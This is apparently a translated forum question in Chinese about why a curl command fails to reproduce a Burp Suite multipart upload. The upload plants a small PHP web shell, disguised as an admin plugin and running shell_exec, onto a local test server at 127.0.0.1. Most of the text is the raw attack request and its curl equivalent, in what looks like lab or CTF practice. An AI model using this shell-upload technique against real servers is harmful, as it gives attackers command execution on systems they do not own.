我正在尝试制作包含以下内容的HTTP数据包:
POST /addon-download.php?addon=/addon-upload.php HTTP/1.1
Host: 127.0.0.1:60080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:60080/menu.php?addon=addons/ots-fs.php
Content-Type: multipart/form-data; boundary=---------------------------98525120815575954697690807
Cookie: PHPSESSID=b03fgbi4assrq5pkdop9bef385
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 354
-----------------------------98525120815575954697690807
Content-Disposition: form-data; name="addon"; filename="ots-shellz.php"
<?php
# Dumbserver Admin Plugin
# Fake phpinfo // or whatever we want
echo shell_exec("whoami" );
echo shell_exec("echo what up my guy" );
?>
-----------------------------98525120815575954697690807--
如果我使用BurpSuite的转发器发送了完全相同的数据,它将成功上传文件。但是当我尝试如下使用curl
时:
curl -X POST -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0' -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8' -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Referer: http://127.0.0.1:60080/menu.php?addon=addons/ots-fs.php' -H 'Content-Type: multipart/form-data; boundary=---------------------------98525120815575954697690807' -H 'Cookie: PHPSESSID=b03fgbi4assrq5pkdop9bef385' -H 'Connection: close' -H 'Upgrade-Insecure-Requests: 1' -H 'Content-Length: 354' -d '-----------------------------98525120815575954697690807
Content-Disposition: form-data; name="addon"; filename="ots-shellz.php"
<?php
# Dumbserver Admin Plugin
# Fake phpinfo // or whatever we want
echo shell_exec("whoami" );
echo shell_exec("echo what up my guy." );
?>
-----------------------------98525120815575954697690807--' -v -i
'http://127.0.0.1:60080/addon-download.php?addon=/addon-upload.php'
它不上传文件。我还尝试将php
部分保存到文件中,然后使用curl
执行-d "data=@./ots-shell.php"
,但仍然不上传文件。我在做错什么吗?